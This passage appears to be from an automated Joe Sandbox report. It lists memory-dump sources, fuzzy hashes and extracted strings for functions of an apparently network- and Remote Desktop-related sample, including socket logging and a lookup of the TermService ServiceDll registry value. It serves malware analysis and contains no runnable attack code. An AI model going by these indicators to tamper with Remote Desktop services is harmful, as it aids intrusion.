                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: 48ce536a705db6c97793462121a9863f2cb2c58c6fa9189182f0ebf2a6c3c87d
                                                                    • Instruction ID: 7ecd3e72a94acbc7223eb8859877353e7314cc4e3950089d1a8badbec20f2d2d
                                                                    • Opcode Fuzzy Hash: 48ce536a705db6c97793462121a9863f2cb2c58c6fa9189182f0ebf2a6c3c87d
                                                                    • Instruction Fuzzy Hash: 8FF0F490B1AE0391FB128787B8401B9635A6F04BF4F0884B5DC4D0B7B8EF2CE5428300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: dd9404e3db5c0461c18871f2139751ef61263b9fda9ef578b80a53aa00013c8c
                                                                    • Instruction ID: 91df6ec028aecff7670a269ac3d2fd45cd3875f481ea418321332b8154cb4b5a
                                                                    • Opcode Fuzzy Hash: dd9404e3db5c0461c18871f2139751ef61263b9fda9ef578b80a53aa00013c8c
                                                                    • Instruction Fuzzy Hash: 2FF0F950A08F17DAFA115747F8005B956156F24BF0F044171CD7C2777AEE2CE5478308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
                                                                    • Instruction ID: b6ca3425774f9f4edb75aa4240e7ca6d9b1a92dbeb84f8df90d30d0f2c7afb2d
                                                                    • Opcode Fuzzy Hash: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
                                                                    • Instruction Fuzzy Hash: 67F0A4D1F1A74752FA719F49A8006B563A1AF44BD0F488131DDDD4B7B8EF2CE6868B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: 6f3c1551105c8dfc7e1f15e3bb900e5261b2279416a7051120b2652ae59b7495
                                                                    • Instruction ID: dff92c6a17fbf2ba8b015acff4071dc511cdb21c8a4c99d457617551d992eeb4
                                                                    • Opcode Fuzzy Hash: 6f3c1551105c8dfc7e1f15e3bb900e5261b2279416a7051120b2652ae59b7495
                                                                    • Instruction Fuzzy Hash: F2F08150B0D61752FA215F5AA8005F56351AF88BC0F048132DDCD0B7B8FE2CE546CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                                                                    • Instruction ID: d29deca759750f9df2f07bd81d687cb7b72cf08c26549e4d24303e4eb548bd00
                                                                    • Opcode Fuzzy Hash: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                                                                    • Instruction Fuzzy Hash: 07F0D190A0869762FA094B85F8841B952116F06BD0F484131DDCD0B7BAEE2EE9828303
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
                                                                    • Instruction ID: 3022929cc10eee8fff162a51c0703f62061bd30e82b1bd1b3675752226b42656
                                                                    • Opcode Fuzzy Hash: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
                                                                    • Instruction Fuzzy Hash: 9EF0A990B0A65751FA514756E9001F9A321AF48FC0F554533ECDD4B779EF2CDA4A8300
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,0000013B444313D0,?,00007FF6BFD6941F), ref: 00007FF6BFD61633
                                                                    • GetLastError.KERNEL32(?,?,00000000,0000013B444313D0,?,00007FF6BFD6941F), ref: 00007FF6BFD61666
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: AddressErrorLastProcfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                    • API String ID: 1224403792-3063791425
                                                                    • Opcode ID: 0ad8ead994b4c2e9daff84b653723ad2f9de5381132992f99bfddf63ec3bb5bb
                                                                    • Instruction ID: f312f485be867969fbff4cc0341b326715e27ce0ffc04d39e2156c5850273a03
                                                                    • Opcode Fuzzy Hash: 0ad8ead994b4c2e9daff84b653723ad2f9de5381132992f99bfddf63ec3bb5bb
                                                                    • Instruction Fuzzy Hash: EBF0D195A0861351FA5147CDE8046A977116F44FC4F084332EE4C8B7B9EF2CE6468380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteshutdown
                                                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                                                    • API String ID: 2143829457-932964775
                                                                    • Opcode ID: 466383becfd062a0ecea402f0b1aab744221932a4668393f1a420154d60cd8f2
                                                                    • Instruction ID: 47a24e5222d09fc9e34f1f7ed106c4fd58c5469b52d16ed35e10fd2b18f77c17
                                                                    • Opcode Fuzzy Hash: 466383becfd062a0ecea402f0b1aab744221932a4668393f1a420154d60cd8f2
                                                                    • Instruction Fuzzy Hash: 4BF0E261E0CD07D1E71167ABE8800BD3B1AAF04BB4F9456B6D80D821F0EF2CE686C301
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                    • API String ID: 4085810780-3386190286
                                                                    • Opcode ID: d72539995aeb001acb87d3728d13f0ca4a4ed8b00041739a3f313744b42f4501
                                                                    • Instruction ID: a7f7acb92336835b871f7f4c5201ac79471b2c5dab2bd741839a6ea03f65a8a6
                                                                    • Opcode Fuzzy Hash: d72539995aeb001acb87d3728d13f0ca4a4ed8b00041739a3f313744b42f4501
                                                                    • Instruction Fuzzy Hash: 40F0B850E0AE07C0FF529B9BA8414B82759AF0ABE8F8D04B4CC0E5A370FD2CA5868300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                    • API String ID: 4085810780-3386190286
                                                                    • Opcode ID: 3bc04daa1e4e890d7f808d105628d7d9c8af52c5097b626737678a73fd546634
                                                                    • Instruction ID: 74664bd6451398bf952fa7ceb8f7070089b1355893af37035285949523c13529
                                                                    • Opcode Fuzzy Hash: 3bc04daa1e4e890d7f808d105628d7d9c8af52c5097b626737678a73fd546634
                                                                    • Instruction Fuzzy Hash: 2EF05850E0AE07D8FD56975BB8454F816506F28BB0B4C09B2CC2C367B6FE2CA9868308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                    • API String ID: 4085810780-3386190286
                                                                    • Opcode ID: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
                                                                    • Instruction ID: fc2fc5445f7da2e2dace002e293ebd0084e4ba1f189d9783a6a7b632a76b8774
                                                                    • Opcode Fuzzy Hash: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
                                                                    • Instruction Fuzzy Hash: 28F05891F0AB4B50F9B59F5EE8505B023A0EF04B84F884531CD8C5B779FE2CA5868B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                    • API String ID: 4085810780-3386190286
                                                                    • Opcode ID: d8c01a19b4c86732eb88897d784f6955c11f9519b64180bb0377644f81f5a94f
                                                                    • Instruction ID: b42a14ee731a479bd96a1635ef235d9ca49bfcba207d255aa726ac193a253406
                                                                    • Opcode Fuzzy Hash: d8c01a19b4c86732eb88897d784f6955c11f9519b64180bb0377644f81f5a94f
                                                                    • Instruction Fuzzy Hash: 09F05E10E4E61B95ED32AF6AB8504F022906F15B80F485532CDCD56379FD1CA586CB40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                    • API String ID: 4085810780-3386190286
                                                                    • Opcode ID: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
                                                                    • Instruction ID: 3dbf31d6739dd06ff57ee898a01d26e60cd3c33657ce7bf9af8cb88d11d6d533
                                                                    • Opcode Fuzzy Hash: b4151e89cc68ab8922232e954921d4160c28e21012f4ccf8fb881e6c53f3d0ac
                                                                    • Instruction Fuzzy Hash: D8F0E214E0E6D770FD499796BCC44B412005F1ABC0F8804B0DC8C57772ED2EA9829302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                    • API String ID: 4085810780-3386190286
                                                                    • Opcode ID: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
                                                                    • Instruction ID: f5871e40deb10dbc477549004d6c6ae5c4c4a0c635c2cb6dea56ed053009dee0
                                                                    • Opcode Fuzzy Hash: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
                                                                    • Instruction Fuzzy Hash: 79F08260F0FA1750FE529B5AA8405F423606F88FC0F595873DCCD57B76ED1CA5898340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastclosesocketfflushfwrite
                                                                    • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                                    • API String ID: 152032778-2221966578
                                                                    • Opcode ID: 81a7abb9ff0da566b5bc1c2cc99b804e0a5bb58d239e64a05326a2431c000775
                                                                    • Instruction ID: d7fe847428256e112764294aeac30120286d7c0e61db8919f4b719d232576d5e
                                                                    • Opcode Fuzzy Hash: 81a7abb9ff0da566b5bc1c2cc99b804e0a5bb58d239e64a05326a2431c000775
                                                                    • Instruction Fuzzy Hash: 2DF03A90E08D0381EB11A7E7E9C10BC365EAF54BB4F5417B5D53E461F2AF6CE5868302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Openstrcmpstrlen
                                                                    • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                                                    • API String ID: 679246061-1413152910
                                                                    • Opcode ID: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
                                                                    • Instruction ID: a571f353aa3f2f5e48ea19dbf935d93756a9b9001fc3d9056103a16012d1f6a3
                                                                    • Opcode Fuzzy Hash: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
                                                                    • Instruction Fuzzy Hash: BF212CA2A1DB8792EA319F10A8913FA6354EB50315F800032E6DE465B5DF2CD649CA40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                    • API String ID: 325303940-110789774
                                                                    • Opcode ID: f8427a8a7679de89cbdc30ff2bcea82045dd5e485bc0249782d8f8000ba83129
                                                                    • Instruction ID: b679ebae72f2fa6d14ea12cf4e8aaf38f605cc54ac613b271515e8e486809a0b
